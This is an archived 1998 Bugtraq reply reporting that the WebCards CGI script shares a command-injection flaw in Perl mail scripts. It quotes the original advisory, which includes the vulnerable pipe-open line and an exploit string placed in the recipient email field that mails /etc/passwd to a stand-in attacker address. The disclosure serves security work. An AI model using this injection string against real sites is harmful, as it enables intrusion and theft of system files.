Bugtraq mailing list archives
Re: Several new CGI vulnerabilities
From: avatar () ULTRA ULTRA NET AU (Karl Hanmore)
Date: Tue, 10 Nov 1998 18:45:24 +1000
G'day, As a related note, the WebCards program (V1.6) by Sam Kareem (webmaster () iraq net) is subject to the same vunerability. Regards, Karl On Mon, 9 Nov 1998, xnec wrote:
INFO: After looking over the perl-CGI scripts on www.cgi-resources.com, I've discovered vulnerabilities in the following:
-----Snip----8<-----------------
EXPLOIT: Each of these are exploitable by inputing metacharacters into the recipient's email address. Each script calls something similar to: open( MAIL, "|$mailprog $email" ) # this particular line is from the LakeWeb scripts The exploit strings are simple, something like &mail evil () foobar com < /etc/passwd&@host.com will work for each script (the @host.com is necessary because some hosts check for "@" and ".") when placed in the Recipient Email field.
-----Snip-----8<---------------
Current thread:
- Several new CGI vulnerabilities xnec (Nov 09)
- Vulnerabilities with Swish Job de Haas (Nov 09)
- Re: Several new CGI vulnerabilities Karl Hanmore (Nov 10)
- Re: Several new CGI vulnerabilities Gus (Nov 10)
- Buffer overflow in Xprt Paolo Molaro (Nov 09)
- Re: Several new CGI vulnerabilities Lincoln Stein (Nov 10)
- Re: Sendmail, lynx, Netscape, sshd, Linux kernel (twice) Andi Kleen (Nov 10)
- Re: Sendmail, lynx, Netscape, sshd, Linux kernel (twice) David S. Miller (Nov 11)
- Vulnerabilities with Swish Jochen Thomas Bauer (Nov 10)
- <Possible follow-ups>
- Re: Several new CGI vulnerabilities Lincoln Stein (Nov 12)